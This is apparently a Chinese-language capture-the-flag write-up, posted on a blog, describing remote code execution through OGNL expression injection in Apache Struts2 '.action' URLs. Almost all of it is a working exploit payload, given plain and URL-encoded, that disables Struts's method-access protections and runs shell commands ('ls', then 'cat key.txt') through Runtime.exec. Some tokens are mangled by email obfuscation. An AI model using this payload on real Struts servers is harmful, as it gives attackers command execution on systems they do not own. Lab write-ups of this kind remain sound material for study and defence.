1. 输入/${1+1}.action,发现表达式被执行,证明存在漏洞

2.写入exp

${

#context[‘xwork.methodaccessor.denymethodexecution’]=false,

#m=#_memberaccess.getclass().getdeclaredfield(‘allowstaticmethodaccess’),

#m.setaccessible(true),

#m.set(#_memberaccess,true),

#[email protected]@tostring(@[email protected]().exec(‘ls’).getinputstream()),

#q

}.action

3.执行失败,对exp进行url转码后再次写入

%24%7b%23context%5b%27xwork.methodaccessor.denymethodexecution%27%5d%3dfalse%2c
%23m%3d%23_memberaccess.getclass%28%29.getdeclaredfield%28%27allowstaticmethodaccess%27%29%2c
%23m.setaccessible%28true%29%2c
%23m.set%28%23_memberaccess%2ctrue%29%2c%23q%[email protected]@tostring%[email protected]@getruntime%28%29.exec%28%27ls%27%29.getinputstream%28%29%29%2c%23q%7d.action

4.拿key

%24%7b
%23context%5b%27xwork.methodaccessor.denymethodexecution%27%5d%3dfalse%2c
%23m%3d%23_memberaccess.getclass%28%29.getdeclaredfield%28%27allowstaticmethodaccess%27%29%2c
%23m.setaccessible%28true%29%2c
%23m.set%28%23_memberaccess%2ctrue%29%2c%23q%[email protected]@tostring%[email protected]@getruntime%28%29.exec%28%27cat%20key.txt%27%29.getinputstream%28%29%29%2c%23q%7d.action

payload

/%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23m.setAccessible%28true%29%2C%23m.set%28%23_memberAccess%2Ctrue%29%2C%23q%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27cat%20key.txt%27%29.getInputStream%28%29%29%2C%23q%7D.action

解码后

/${#context['xwork.MethodAccessor.denyMethodExecution']=false,#m=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#m.setAccessible(true),#m.set(#_memberAccess,true),#[email protected]@toString(@[email protected]().exec('cat key.txt').getInputStream()),#q}.action
说点什么
支持Markdown语法
好耶,沙发还空着ヾ(≧▽≦*)o
Loading...